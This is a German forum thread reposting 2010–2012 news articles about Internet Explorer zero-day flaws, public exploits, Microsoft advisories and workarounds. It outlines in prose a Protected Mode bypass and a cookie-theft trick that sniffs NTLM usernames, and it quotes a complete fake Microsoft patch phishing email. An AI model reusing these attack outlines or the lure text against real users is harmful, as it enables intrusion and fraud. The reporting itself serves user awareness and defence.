Durch einen Fehler in "window.onerror" könnten Angreifer sensible Daten aus Microsofts Browser Internet Explorer 7 und 8 extrahieren. Die Sicherheitslücke wird als nicht kritisch eingestuft. Dennoch ist der Bug laut Evans Blog (http://scarybeastsecurity.blogspot.com/2010/10/minor-leak-major-headache.html) schon seit 2006 bekannt und hat sich auch in Firefox ausnutzen lassen. Microsoft wurde angeblich schon im Jahre 2008 informiert. Im Oktober 2010 entschloss sich Evans nun für ein so genanntes "Full Disclosure".
Die Schwachstelle lässt sich unter einem Windows XP SP3 auf dem aktuellen Stand mit Internet Explorer 7 und 8 reproduzieren. Ein Update steht derzeit nicht zu Verfügung. Anwender des Browsers sollten nur vertrauenswürdige Webseiten besuchen.
Quelle : www.tecchannel.de
Titel: Internet Explorer - Microsoft warnt vor Sicherheitslücke
Beitrag von: SiLæncer am 03 November, 2010, 19:15
Im Internet Explorer hat Microsoft ein Sicherheitsloch entdeckt, das aktiv ausgenutzt wurde. Über eine Webseite wurde Schadcode verteilt, aber vorerst ist die Seite abgeschaltet. Derzeit sind keine weiteren aktiven Attacken bekannt, ein Patch ist in Arbeit.
Microsoft stuft das Sicherheitsloch nicht als sonderlich gefährlich ein, hat aber aufgrund aktiver Angriffe ein Security Advisory (https://www.microsoft.com/technet/security/advisory/2458511.mspx) veröffentlicht. Über das Sicherheitsloch können Angreifer Schadcode ausführen und so fremde Computer unter ihre Kontrolle bringen. Bis auf die Betaversion des Internet Explorers 9 sollen alle Versionen von Microsofts Browsern von dem Fehler betroffen sein.
Im zugehörigen Security Advisory (http://www.microsoft.com/technet/security/advisory/2458511.mspx) hat Microsoft verschiedene Möglichkeiten beschrieben, wie ein Angriff verhindert werden kann. Ansonsten hilft der Einsatz eines anderen Browsers.
Microsoft arbeitet derzeit an einem Patch. Es ist nicht vorgesehen, den Patch außerhalb des regelmäßigen Patchdays zu veröffentlichen. Der nächste Patchday ist am 9. November 2010 geplant. Es ist nicht davon auszugehen, dass der Patch bis dahin fertig wird, so dass es mindestens bis Dezember 2010 dauern wird, bis das Sicherheitsloch beseitigt wird.
Quelle : www.golem.de
Titel: Exploit für Zero-Day-Lücke im Internet Explorer verfügbar
Beitrag von: SiLæncer am 06 November, 2010, 11:08
Jetzt wird Microsoft wohl doch einen Notfall-Patch für den Internet Explorer in Erwägung ziehen müssen: Ein Exploit für die kürzlich gemeldete Lücke in der Verarbeitung von Cascading Style Sheets (CSS) steht in der Exploit-Datenbank exploit-db.com zum Download bereit.
Er öffnete in einem kurzen Test der heise Security Redakton unter Windows XP mit dem Internet Explorer 8 eine Hintertür (Reverse Shell) auf Port 4444. Allerdings war es zum Funktionieren des Exploits notwendig, im Internet Explorer 8 die standardmäßig aktivierte Datenausführungsverhinderung (DEP) abzuschalten. Zumindest von diesem Exploit sind Anwender des Internet Explorer 8 nicht bedroht. Beim Internet Explorer 6 und 7 ist DEP von Hause aus jedoch nicht aktiviert – dort funktioniert der Exploit sofort.
Angreifer könnten über die Hintertür Zugriff auf den Windows-PC erhalten oder Malware installieren. Bislang hatte die CSS-Lücke nach Meinung von Microsoft die Kriterien für einen Notfall-Patch nicht erfüllt – unter anderem, weil es bislang nur wenige gezielte Angriffe auf Anwender in Unternehmen gab und der verwendete Exploit nicht öffentlich war.
Bis ein Patch bereit steht, empfiehlt der Hersteller die Datenausführungsverhinderung (DEP) für den Internet Explorer unter Windows 7, Vista oder XP zu aktivieren. Der einfachste Weg DEP beim Internet Explorer 7 nachträglich zu aktivieren ist es, ein von Microsoft bereit gestelltes Fix-it-Tool (http://support.microsoft.com/kb/2458511) herunterzuladen und zu starten. Daneben gibt es ein zweites Fix-it-Tool (http://support.microsoft.com/kb/2458511/en-us), das benutzerdefinierte CSS abschaltet und so Angriffe ins Leere laufen lässt. Dies dürfte das Mittel der Wahl für Anwender des Internet Explorer 6 sein – von denen wohl noch etliche im Einsatz sind.
Daneben lassen sich DEP und weitere Schutzmechanismen unter Windows über das Enhanced Mitigation Experience Toolkit (EMET) aktivieren. Der Artikel "Schadensbegrenzer (http://www.heise.de/security/artikel/Microsoft-Tool-laesst-Exploits-ins-Leere-laufen-1078697.html)" auf heise Security erklärt, wie das Tool funktioniert und wie man es bedient.
Quelle : www.heise.de
Titel: Lücke im Internet Explorer: Die Einschläge kommen näher
Beitrag von: SiLæncer am 11 November, 2010, 15:56
Ausgerechnet die Webseite von Amnesty International Hongkong versuchte Besucher mit Malware zu infizieren und benutzte dazu unter anderem einen Exploit für die immer noch offene Lücke im Internet Explorer. Das berichtet der AV-Hersteller Websense in seinem Blog. Kriminelle haben laut dem Bericht die Webseite manipuliert, um den Exploit in einem iFrame einzubinden. Politische Seiten sind offenbar bei Kriminellen derzeit in Mode: Erst vor zwei Wochen hatten Unbekannte einen Zero-Day-Exploit für Firefox in der Webseite des Friedensnobelpreises platziert.
Die neuen Angriffe bestätigen Beobachtungen, wonach der Exploit mittlerweile in kommerziellen Exploits-Pack für Kriminelle enthalten ist – damit dürften die Angriffe in Kürze zunehmen. Exploit-Packs nehmen Besucher manipulierter Webseiten aus verschiedenen Richtungen unter Beschuss, um größtmöglichen Erfolg beim Infektionsversuch zu haben. Neben dem Exploit für den Internet Explorer wartete die AI-Seite mit Modulen für Lücken in QuickTime, Flash und Shockwave auf.
Microsoft arbeitet weiterhin an einem Patch, hat sich aber bislang nicht dazu geäußert, ob es einen Notfall-Patch noch vor dem nächsten Patchday geben wird. Bis dahin empfiehlt der Hersteller, die Datenausführungsverhinderung (DEP) für den Internet Explorer unter Windows 7, Vista oder XP zu aktivieren. Beim Internet Explorer 8 ist dies bereits standardmäßig der Fall.
Um DEP beim Internet Explorer 7 nachträglich zu aktivieren, bietet Microsoft ein Fix-it-Tool zum Download an. Daneben gibt es ein zweites Fix-it-Tool, das benutzerdefinierte CSS anschaltet und so Angriffe ins Leere laufen lässt. Daneben lassen sich DEP und weitere Schutzmechanismen unter Windows über das Enhanced Mitigation Experience Toolkit (EMET) aktivieren. Der Artikel "Schadensbegrenzer " auf heise Security erklärt, wie das Tool funktioniert und wie man es bedient.
Quelle : http://www.heise.de/newsticker/meldung/Luecke-im-Internet-Explorer-Die-Einschlaege-kommen-naeher-1135016.html
Titel: Vermeintlicher Patch für Internet Explorer enthielt Trojaner
Beitrag von: SiLæncer am 12 November, 2010, 16:40
Kriminelle haben in einer Spam-Mail-Welle Links zu vorgeblichen Sicherheits-Patches für den Internet Explorer 9 und Firefox 3 verteilt. Der Link führte zu der Domain microsoft-security.de, unter der die Kriminellen eine täuschend echt nachgemachte Seite für das Microsoft Download Center aufgesetzt hatten. Der dort versprochene Patch enthielt aber einen Trojaner.
Die Masche mit gefälschten Sicherheits-Updates ist eigentlich ein alter Hut, diesmal haben sich die Angreifer jedoch die Mühe gemacht, ihren Mail-Text in fehlerfreiem Deutsch zu verfassen:
Lieber Microsoft-Kunde,
wir freuen uns Ihnen mitteilen zu dürfen,daß wir Ihnen zum bestehenden Sicherheitsproblem bzgl. Internet Explorer 9 und Firefox 3.x einen Update-Patch bereitstellen können. Kompatibel mit Windwos XP / VISTA und Windows 7. .... unter dem Punkt "Update for Windows XP/VISTA/WIN7"
1. Downloaden Sie den Update-Patch 2. Update-Patch ausführen durch Doppelklick oder Rechtsklick/öffnen 3. Nach der Installation starten Sie Ihr Betriebssystem neu.
Mit freundlichen Grüßen
Steve Lipner Director of Security Assurance Microsoft Corp.
Daneben bot die Mail einen direkten Download-Link zu der Datei patch-web.exe an. Anwender, die sich in Erwartung eines Updates für die aktuelle Lücke im Internet Explorer die Datei heruntergeladen und gestartet haben, könnten nun ein Problem haben. Zwar ist die Domain microsoft-security.de mittlerweile gesperrt, in der Regel modifizieren die Kriminellen ihre Malware-Kampagnen jedoch recht schnell, sodass vermutlich bald weitere Spam-Mails mit anderen Links auftauchen.
Grundsätzlich gilt auch für solche Fälle: Links in Mails ist grundsätzlich zu misstrauen, es sei denn, sie stehen in einem aktuellen Kontext eines bestehenden Mailverkehrs. Anwender sollten Updates nur von den bekannten offiziellen Seiten der Hersteller herunterladen oder sich auf einschlägigen Seiten über verfügbare Patches informieren.
Quelle : www.heise.de
Titel: Protected Mode des Internet Explorer lässt sich austricksen
Beitrag von: SiLæncer am 04 Dezember, 2010, 13:15
Mit dem Internet Explorer 7 und Windows Vista führte Microsoft den Protected Mode (geschützter Modus ) für seinen Browser ein: Er soll den Rechner vor Angriffen durch Schwachstellen in IE-Erweiterungen oder im Browser selbst schützen und das Aufspielen von Schadsoftware auf diesem Weg verhindern.
(http://www.heise.de/imgs/18/6/0/2/7/3/6/Bildschirmfoto_2010-12-04_um_12.30.47-f9fb737eef52e9fb.jpeg) Im IE 8 ist der Protected Mode für alle Sites des lokalen Intranet abgeschaltet.
Forscher von Verizon Business beschreiben (PDF (http://www.verizonbusiness.com/resources/whitepapers/wp_escapingmicrosoftprotectedmodeinternetexplorer_en_xg.pdf)) nun einen Weg, wie sich der Protected Mode im IE 7 und 8 umgehen lässt, um Zugriff auf Benutzerkonten erhält. Voraussetzung ist eine Schwachstelle im Browser oder einer Erweiterung, die das Ausführen von Schadcode erlaubt. Dieser läuft zwar zunächst nur im sogenannten Low Integrity Mode des Browsers, kann jedoch trotzdem einen Webserver auf dem Rechner starten, der Anfragen auf einem beliebigen Port des Loopback-Interfaces beantwortet. Durch Aufruf der Funktion IELaunchURL() kann der Angreifer den IE zum Laden einer URL von diesem Webserver veranlassen, etwa "http://localhost/exploit.html". In der Regel gehört localhost zur Local Intranet Zone des IE; für Inhalte aus dieser Zone ist der Protected Mode deaktiviert.
Nutzt man nun in dieser Situation denselben Exploit ein zweites Mal aus, lässt sich beliebiger Code in der Sicherheitsstufe "Medium Integrity" ausführen. Er hat dann Zugriff auf das Benutzerkonto und kann beliebige Software dauerhaft auf dem Rechner installieren.
Als Schutz vor dem beschriebenen Angriff empfehlen die Forscher unter anderem, möglichst wenige Sites in die lokale Intranetzone des IE aufzunehmen und den Protected Mode für alle Zonen des Browsers zu aktivieren.
Quelle : www.heise.de
Titel: Internet Explorer: Kritische CSS-Lücke entdeckt
Beitrag von: SiLæncer am 13 Dezember, 2010, 21:36
Die Sicherheitsexperten von 'Vupen (http://www.vupen.com/english/advisories/2010/3156)' machen auf eine bisher ungepatchte Sicherheitslücke im Internet Explorer von Microsoft aufmerksam. Ein Angreifer könnte die komplette Kontrolle über ein verwundbares System übernehmen, heißt es.
Schuld sei an dieser Problematik ein Fehler in der Programmbibliothek namens mshtml.dll. Dieser tritt auf, wenn Webseiten mit Cascading Style Sheets (CSS) verarbeitet werden, in denen bestimmte "@import"-Referenzen enthalten sind. Über entsprechend präparierte Webseiten soll sich die Schwachstelle ausnutzen lassen.
Den Angaben von Vupen zufolge ist von diesem Fehler der Internet Explorer 8 unter Windows 7, Windows Vista SP2 und Windows XP SP3 betroffen. Ebenfalls anfällig seien die Versionen 6 und 7 des Microsoft-Browsers unter Windows XP mit installiertem Service Pack 3.
Ob die Schwachstelle bereits aktiv im großen Rahmen ausgenutzt wird, ist gegenwärtig noch unklar. Abgesehen von der bestätigten Schwachstelle selbst wurde im Netz auch erster Beispielcode veröffentlicht.
Wann mit einem Patch von Microsoft zu rechnen ist, teilte der Softwarekonzern aus Redmond noch nicht mit. Im Allgemeinen haben die Entwickler noch nicht auf diese Schwachstelle reagiert.
Quelle : http://winfuture.de
Titel: Exploit für ungepatchte Internet-Explorer-Lücke veröffentlicht
Beitrag von: SiLæncer am 22 Dezember, 2010, 17:23
Für die seit rund zwei Wochen bekannte kritische Lücke im Internet Explorer ist nun ein Exploit (https://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms11_xxx_ie_css_import.rb) im Umlauf. Der Angreifer muss den IE-Nutzer lediglich auf eine speziell präparierte Webseite lotsen, um beliebigen Schadcode auf dem System des Opfers auszuführen.
Die Schwachstelle tritt bei der Auswertung von @import-Regeln in Cascading Style Sheets (CSS) auf. Laut Vupen sind die Internet-Explorer-Versionen 6 bis 8 unter Windows XP bis 7 verwundbar, auch Windows Server. Microsoft hat sich bislang nicht zu dem Problem geäußert. Ob und wann ein Patch kommt, ist derzeit noch unklar.
Quelle : www.heise.de
Titel: Microsoft warnt vor kritischer IE-Lücke
Beitrag von: SiLæncer am 23 Dezember, 2010, 12:29
Wer an den bevorstehenden Feiertagen mit dem Internet Explorer im Netz unterwegs ist, muss Vorsicht walten lassen: Durch eine kritische Sicherheitslücke im IE, für die seit kurzem auch ein Exploit kursiert, kann man seinen Rechner beim Besuch einer verseuchten Webseite mit Schadcode infizieren. Jetzt warnt auch Microsoft in einem Advisory (http://www.microsoft.com/technet/security/advisory/2488013.mspx) vor der Gefahr und bestätigt die Berichte, nach denen die Internet-Explorer-Versionen 6 bis 8 unter sämtlichen Windows-Ausgaben verwundbar sind.
Der Exploit nutzt eine Schwachstelle bei der Verarbeitung des @import-Tags in Cascading Style Sheets (CSS), um Datenausführungsverhinderung (DEP) und Adress Space Layout Randomisation (ASLR) zu überwinden. Als Workaround empfiehlt der Hersteller, den Prozess iexplore.exe mit dem kostenlosen Sicherheitstool EMET (http://www.dvbcube.org/index.php?topic=29600.0) abzuhärten.. Ein Patch ist derzeit in Arbeit, jedoch will sich Microsoft noch nicht festlegen, ob dieser außer der Reihe oder erst am nächsten Patchday erscheint.
Laut Microsoft kann der Schadcode unter Windows Vista und 7 nur mit eingeschränkten Rechten wüten, da der IE die Seiten hier standardmäßig im geschützten Modus ausführt. Ansonsten hat der Schädling zunächst die Rechte des angemeldeten Nutzers. Das ist vor allem bei Windows XP ein Problem, da die Anwender hier häufig dauerhaft mit Adminrechten angemeldet sind. Unter Windows Server 2003 und 2008 werden Internetseiten in der Standardkonfiguration mit der höchsten Sicherheisstufe geladen, was die Angriffsfläche laut Microsoft zumindest reduzieren soll.
Mailclients wie Outlook, Outlook Express und Windows Mail, die den IE zur Darstellung von HTML-Mails nutzen, verzichten zunächst auf das Ausführen von JavaScript und ActiveX-Controls. Das soll es Angreifern erschweren, Schadcode auf dem System auszuführen. Da man die Lücke jedoch über CSS ausnutzen kann, stellt sich die Frage, ob diese Information die Anwender nicht in falscher Sicherheit wiegt. Auch andere Programme, welche die IE-Komponente nutzen, dürften auf diesem Wege angreifbar sein.
Quelle : www.heise.de
Titel: CSS-Schwachstelle im Internet Explorer wird aktiv ausgenutzt
Beitrag von: SiLæncer am 12 Januar, 2011, 12:53
Eine kritische Sicherheitslücke im Microsoft Internet Explorer wird offenbar zunehmend von Cyberkriminellen ausgenutzt. Die seit Dezember bekannte Schwachstelle basiert auf einem Fehler bei der Handhabung von Cascading Style Sheets (CSS) und erlaubt bei richtiger Ausnutzung die Übernahme des Rechners. Einen Patch gibt es bisher nicht.
Eine Besonderheit der Sicherheitslücke ist die Tatsache, dass die Schutzfunktionen moderner Windows-Systeme ausgehebelt werden. Die in das aktuelle Betriebssystem Windows 7 eingebauten Sicherheitsmechanismen DEP (data execution prevention) und ASLR (address space layout randomization) bieten in diesem Fall keinen zuverlässigen Schutz. Somit sind auch Windows 7 und der Internet Explorer 8 von der Problematik betroffen.
Microsoft hatte die Schwachstelle Ende Dezember bestätigt. Da zu diesem Zeitpunkt jedoch keine Fälle bekannt waren, in denen die Schwachstelle aktiv ausgenutzt wurde, sah man zunächst keinen Grund für ein außerplanmäßiges Update. Man beschloss, die Situation weiter zu beobachten und im Falle einer weiterhin akzeptablen Bedrohungslage auf den Februar-Patchday - dem nächsten regulären Termin für Browser-Updates - zu warten.
Nun gerät der Internet Explorer jedoch aufgrund dieses Fehlers zunehmend unter Beschuss. In einem Update des Advisories zum Thema heißt es, es gebe "begrenzte Angriffe", die man derzeit untersuche. Zudem veröffentlichte Microsoft einen Workaround, mit dem sich die Problematik umgehen lässt. Dieser könnte allerdings womöglich die Funktionalität des Browsers auf bestimmten Seiten einschränken. Microsoft erwähnt, Benutzer könnten eine höhere Hardware-Belastung beziehungsweise "leichte Performance-Probleme" erleben. Dies liege an der Notwendigkeit, CSS-Dateien zu blockieren.
Bisher gibt es keine offizielle Ankündigung, wann ein Update zur Verfügung gestellt wird.
Quelle : www.gulli.com
Titel: Internet Explorer: Cookie-Klau leicht gemacht
Beitrag von: SiLæncer am 26 Mai, 2011, 12:39
Der Sicherheitsforscher Rosario Valotta hat eine Zero-Day-Lücke in allen Versionen des Internet Explorer gefunden, die sich für einen Diebstahl beliebiger Cookies über das Netz eignet. Normalerweise verhindert das Sicherheitszonenmodell des Internet Explorer, dass Seiten aus der Internetzone Inhalte aus der lokalen Zone, also etwa von der Festplatte, als iFrame einbetten. Der Forscher hat entdeckt, dass Cookies hiervon offenbar ausgenommen sind und man sie sehr wohl in iFrames laden kann. Anschließend wird der Cookietext unsichtbar markiert und vom Nutzer vom iFrame in das Hauptfenster herübergezogen und fallengelassen. Damit der Anwender davon nichts mitbekommt, hat Valotta das Ganze in ein Spiel verpackt.
Trivial ist dieser Angriff nicht: Abgesehen davon, dass das Auslesen der Daten mittels Drag&Drop die Internetaktion des Opfers erfordert, was Valotta in seinem Demovideo mit einem einfachen Puzzlespiel gelöst hat, muss der Angreifer auch den genauen Pfad des Cookies kennen. Der Pfad enthält den Windows-Benutzernamen des Opfers, welchen der Angreifer daher erst einmal in Erfahrung bringen muss.
Valotta löst dies, indem er ein Bild in die Angriffswebseite eingebettet, das auf einer SMB-Netzwerkfreigabe liegt. Zum Zugriff verlangt der Server jedoch eine Authentifizierung per NTLM. Dabei sendet der Rechner den Benutzernamen des angemeldeten Nutzers im Klartext – was der Angreifer einfach mit einem Packet-Sniffer mithören kann. Auch die Betriebssystemversion des Opfers muss der Angreifer in Erfahrung bringen, um den Pfad zu vervollständigen; etwa indem er das JavaScript-Objekt navigator.userAgent auswertet. Gegenüber einem passiven Angriff mit Firesheep ist der Aufwand also deutlich höher.
Gegenüber Reuters gab Valotta an, auf diese Weise innerhalb von drei Tagen über 80 Cookies seiner 150 Freunde bei Facebook eingesammelt zu haben. Valotta hat die ursprüngliche Lücke am 28. Januar des laufenden Jahres dem Microsoft Security Response Center gemeldet, wohin das Problem bis zum Erscheinen der Finalversion des IE9 am 18. März auch behoben wurde. Allerdings hat der Forscher nur zwei Wochen darauf bereits einen leicht abgewandelten Weg gefunden, auch die Cookies von IE9-Nutzern zu stehlen, wie er auf der Sicherheitskonferenz Hackinthebox in Amsterdam demonstrierte.
Quelle : http://www.heise.de/newsticker/meldung/Internet-Explorer-Cookie-Klau-leicht-gemacht-1250725.html
Titel: Schwachstelle im Internet Explorer wird aktiv ausgenutzt
Beitrag von: SiLæncer am 14 Juni, 2012, 06:00
Microsoft und Google warnen unabhängig voneinander vor einem Zero-Day-Exploit für den Internet Explorer (IE), der für die Ausführung von Schadcode genutzt werden kann und offenbar dazu eingesetzt wird, in GMail-Konten einzubrechen. Bislang gibt es keinen Patch für die Schwachstelle. Microsoft stellt jedoch mittlerweile einen automatisierten Workaround bereit.
Microsoft warnt in einem am gestrigen Dienstag veröffentlichten Advisory (http://technet.microsoft.com/en-us/security/advisory/2719615) vor der Schwachstelle, die bereits aktiv ausgenutzt werde. Die Schwachstelle, die auf einem Fehler in der Speicherverwaltung beruht, ermöglicht das Ausführen von Schadcode mit wenig oder gar keiner Benutzer-Interaktion - das Opfer muss lediglich eine entsprechend präparierte Website mit dem verwundbaren Browser ansurfen (ein sogenannter "Drive-by-Download").
Google warnte in einer separaten Nachricht ebenfalls vor der Schwachstelle und berichtete, diese werde "in freier Wildbahn aktiv für gezielte Angriffe ausgenutzt". Einem Bericht der Sicherheitsexperten Ryan Naraine, Emil Protalinski und Dancho Danchev vom Blog "Zero Day" zufolge bestätigte eine Quelle aus dem Umfeld des Google-Sicherheitsteams, die Schwachstelle beziehungsweise deren Ausnutzung für gezielte Angriffe auf GMail-Konten stehe hinter Googles kürzlicher Entscheidung, GMail-Nutzer explizit vor "staatlich gesponserten Angriffen" auf ihre Mail-Konten zu warnen. Auf Twitter gibt es mittlerweile eine ganze Reihe von GMail-Nutzern, die berichten, die entsprechende Warnung erhalten zu haben.
Einen Patch für die Schwachstelle gibt es bislang nicht. Microsoft stellt jedoch mittlerweile ein Tool zur Verfügung, das automatisiert den entsprechenden Angriffsvektor blockiert. Auf der Microsoft-Website findet sich eine Anleitung (http://support.microsoft.com/kb/2719615) zur Anwendung des Tools. Alternativ können Nutzer des Internet Explorer auch die Nutzung von Active Script ganz deaktivieren oder nur auf explizite Nachfrage erlauben.
Quelle : www.gulli.com
Titel: Exploit für ungepatchte IE-Lücke veröffentlicht
Beitrag von: SiLæncer am 17 Juni, 2012, 13:00
Für die jüngst bekannt gewordene kritische Lücke in den Microsoft XML Core Services, die sich via Internet Explorer und über Office-Dokumente ausnutzen lässt, gibt es inzwischen einen öffentlichen Exploit (http://dev.metasploit.com/redmine/projects/framework/repository/revisions/8a89968a1dc1617c6e79f2ec2b310d1785811bec/changes/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb). Dieser funktioniert derzeit zwar nur mit Microsoft XML Core Services 3.0 via IE6 und IE7 über Windows XP (SP3). Grundsaetzlich betroffen sind jedoch alle Windows-Versionen, sodass es höchste Zeit ist, das von Microsoft herausgegebene "FixIt" einzuspielen.
Typischerweise dauert es nur wenige Tage, bis öffentliche Exploits in großem Stil ausgenutzt werden. Gerüchteweise waren Angriffe über diese Lücke der Auslöser für Googles Warnsystem vor möglichen staatlichen Angriffen.
Quelle : www.heise.de
Titel: Windows 8 vor Veröffentlichung mit Flash-Lücke
Beitrag von: SiLæncer am 09 September, 2012, 15:36
Wie Googles Chrome hat auch Microsoft in der kommenden Version 10 des Internet Explorer den Flash-Player bereits integriert und kümmert sich selbst um die Updates. Oder auch nicht. Denn in Windows 8 ist nach wie vor die Version 11.3.372.94 vom 19. Juli 2012 installiert, obwohl es von Adobe bereits am 15. August ein Sicherheitsupdate gab, dem nach nur einer Woche ein weiteres folgte.
Der ganze Artikel (http://www.heise.de/newsticker/meldung/Windows-8-vor-Veroeffentlichung-mit-Flash-Luecke-1703223.html)
Quelle : www.heise.de
Titel: Microsoft will Flash-Lücke im IE10 nun doch schließen
Beitrag von: SiLæncer am 12 September, 2012, 16:00
Nachdem es Kritik hagelte, will Microsoft den in seinem neuen Internet Explorer festintegrierten Flash Player nun doch vor der offiziellen Freigabe von Windows 8 aktualisieren. ZDNet berichtet, Microsoft wolle "in Kürze" einen Fix bereitstellen. Er soll eine Sicherheitslücke schließen, die Adobe in seinem eigenen Player bereits im August behoben hatte.
Ursprünglich wollte Microsoft mit dem Patch bis zum offiziellen Erscheinungstermin von Windows 8 am 26. Oktober 2012 warten, da das automatisch Update für Windows 8 noch nicht in Betrieb ist. Das Betriebssystem steht jedoch schon seit Mitte August den Abonnenten von MSDN und Technet zur Verfügung, und auch Unternehmen können eine Testversion herunterladen.
Der ganze Artikel (http://www.heise.de/ix/meldung/Microsoft-will-Flash-Luecke-im-IE10-nun-doch-schliessen-1705228.html)
Quelle : www.heise.de
Titel: Angreifer nutzen ungepatche Internet-Explorer-Lücke aus
Beitrag von: SiLæncer am 17 September, 2012, 17:00
Cyber-Ganoven nutzen eine bislang offenbar unbekannte und ungepatchte Schwachstelle im Internet Explorer aus, um Rechner mit Malware zu infizieren, wie Eric Romang in seinem Blog berichtet. Die Lücke hängt anscheinend damit zusammen, wie der IE <img>-Elemente in HTML-Dateien verarbeitet. Bislang haben es die Angreifer ausschließlich auf die IE-Versionen 7 und 8 unter Windows XP abgesehen. Ob der Exploit auch in Verbindungen mit anderen Software-Konstellationen zündet, ist noch unklar.
Der ganze Artikel (http://www.heise.de/security/meldung/Angreifer-nutzen-ungepatche-Internet-Explorer-Luecke-aus-1709371.html)
Quelle : www.heise.de
Titel: Warnung vor Internet-Explorer-Lücke ausgedehnt
Beitrag von: ritschibie am 18 September, 2012, 11:40
Wer derzeit zum Surfen einen Microsoft-Browser nutzt, sollte fürs erste davon absehen, außer im Falle des Internet Explorer 10, der bei Windows 8 vorinstalliert ist. Diese Version ist als einzige nicht betroffen, ansonsten wurde die Warnung vor dem IE auf alle Betriebssystem-Ausgaben ausgedehnt.
Gestern Abend berichten wir über eine kritische Sicherheitslücke beim Internet Explorer (IE) 7 sowie 8. Nachdem es zunächst geheißen hatte, dass nur Windows XP davon betroffen ist, hat das Redmonder Unternehmen in der Nacht auf heute die Warnung (deutlich) ausgedehnt und zwar auf praktisch alle derzeit üblichen IE-Ausgaben und Microsoft-Betriebssysteme.
Die Schwachstelle, die dazu verwendet werden kann, um beliebigen Schadcode auf ein System einzuschleusen, betrifft laut einer Warnung in Microsofts 'Security TechCenter' die Internet-Explorer-Versionen 6, 7, 8, und 9, Nummer 10 ist, wie anfangs erwähnt, ausgenommen.
Bei der Sicherheitslücke handelt es sich um einen Fehler, der auftritt, wenn der Internet Explorer auf ein Objekt zugreift, das gelöscht oder nicht ordnungsgemäß zugeteilt worden ist. Dieses Sicherheitsproblem kann von Angreifern mit Hilfe einer manipulierten Webseite ausgenutzt werden.
Microsoft gibt an, dass das Problem derzeit untersucht wird, davon hängt auch ab, welche Gegenmaßnahme ergriffen wird, also ob es ein Update im Rahmen des monatlichen Patch-Days geben wird oder ob es einen außerplanmäßigen Fix geben wird. Angesichts der Schwere der Lücke ist aber wohl letzteres zu erwarten.
Unter dem Punkt "Suggested Actions (https://blogs.technet.com/b/msrc/archive/2012/09/17/microsoft-releases-security-advisory-2757760.aspx?Redirected=true)" führt Microsoft einige Workarounds auf, darunter die Installation des Enhanced Mitigation Experience Toolkit (EMET) sowie die Deaktivierung von ActiveX und Active Scripting (über Sicherheits-Stufe Hoch in den Internet-Einstellungen). Mittlerweile hat auch das Bundesamt für Sicherheit für Informationstechnik eine Warnung vor diesem Exploit bzw. dem Internet Explorer herausgegeben, dort wird auch das wohl einfachste Gegenmittel empfohlen, nämlich die Nutzung eines anderen Browsers.
Quelle: www.winfuture.de
Titel: Re: Warnung vor Internet-Explorer-Lücke ausgedehnt
Beitrag von: Jürgen am 18 September, 2012, 23:22
Es gibt noch weitere Besorgnisse, die möglicherweise trotz Verwendung anderer Browser bedacht werden sollten.
Der IE ist nicht nur ein Browser, sondern er liefert, je nach Windows-Version, auch noch ein ganzes Bündel an System-Funktionen mit, das u.U. auch indirekt missbraucht werden könnte, und zwar auch, wenn der IE nicht als Standard-Browser eingetragen ist.
So gibt es Dateitypen-Zuweisungen, die oft trotz anderer Standardbrowser meist mit dem IE (.html, .mht usw.) oder verknüpften Komponenten (z.B. Hilfe-System) geöffnet werden. Und das in der standardmäßig als sicher(er) eingeschätzten lokalen Zone... Manche davon könnten sogar auch externe Webinhalte aufrufen, ggf. über die IE Engine.
So sollten sich vorerst auch geübte Nutzer anderer Browser nicht leichtfertig in Sicherheit wähnen, bevor nicht weitere Details bekannt sind.
Aus ähnlichen Überlegungen heraus habe ich Dateitypen-Verknüpfungen immer wieder mal durchgeflöht und solche zum IE händisch umgebogen, oder derlei Dateien zumindest in alternativen Browsern strikt auf Speichern statt Öffnen gesetzt.
Allerdings gibt es auch Anwendungen, die fahrlässigerweise an irgendeiner Stelle den IE direkt aufrufen, nicht den Standardbrowser. Wenn ich mich recht erinnere, galt das auch mal z.B. für die EPG-Anzeige per HTML in originaler DVB-Software. Man sei also insbesondere dann gewarnt, wenn eine Anwendung bei der Installation eine bestimmte IE-Version als Mindestanforderung angibt. Jubelt man dem Nutzer nun irgendwie ein Plugin dafür unter, könnte auch darüber eine IE-Schwachstelle ausgenutzt werden.
Jürgen
Titel: Microsoft will kritische IE-Lücke behelfsmäßig schließen
Beitrag von: SiLæncer am 19 September, 2012, 11:30
Microsoft will im Laufe der nächsten Tage ein Fix-it-Tool anbieten, das die kritische Internet-Explorer-Lücke behelfsmäßig abdichten soll, bis ein passender Patch bereitsteht. Dies gab das Unternehmen in seinem Sicherheitsblog bekannt.
Das Tool soll "jeder Internet-Explorer-Nutzer" installieren können und sich nicht weiter auf das Surfen auswirken – beide wichtige Punkte, die die derzeit von Microsoft empfohlenen Workarounds nicht erfüllen. Denn das Abdichten mit dem Admin-Tool EMET, das nur in englischer Sprache angeboten wird, bekommt längst nicht jeder hin. Und das Deaktivieren von Active Scripting führt dazu, dass viele Webseiten nicht mehr vernünftig funktionieren.
Microsoft gibt in seinem Blog an, dass bislang nur "ein paar" Versuche beobachtet wurden, die Schwachstelle auszunutzen und davon nur eine "extrem begrenzte Anzahl von Personen" betroffen seien. Die Tatsache, dass längst ein Modul für das Angriffsframework Metasploit verfügbar ist, mit dem jedermann die Lücke für seine Zwecke ausnutzen kann, erwähnt das Unternehmen indes nicht.
Auch den einfachsten Weg, sich sofort vor Angriffen durch die IE-Lücke zu schützen, verschweigt Microsoft seinen Kunden weiterhin – nämlich den Einsatz eines alternativen Webbrowsers wie Firefox oder Google Chrome. Auch das Bundesamt für Sicherheit in der Informationstechnik (BSI) rät dazu, den IE zu meiden, bis Microsoft das Problem in den Griff bekommen hat.
Wer sich für die Details der Schwachstelle interessiert, findet eine detaillierte Analyse bei dem Sicherheitsblog Vulnhunt. Es handelt sich demnach um eine sogenannte Use-after-free-Lücke in der Funktion CMshtmlEd::Exec(). Sie führt im Endeffekt dazu, dass der IE beim Aufruf spezieller präparierter Webseiten Schadcode ausführt.
Quelle: www.heise.de
Titel: Microsoft flickt kritische Internet-Explorer-Lücke
Beitrag von: SiLæncer am 20 September, 2012, 12:30
Microsoft hat ein Fix-it-Tool herausgegeben (http://support.microsoft.com/kb/2757760), mit dem die kritische Schwachstelle im Internet Explorer bis zum Erscheinen eines Patches provisorisch abgedichtet werden kann. Den endgültigen Patch will das Unternehmen ab dem morgigen Freitag über Windows Update verteilen, wie es in seinem Sicherheitsblog angekündigt hat.
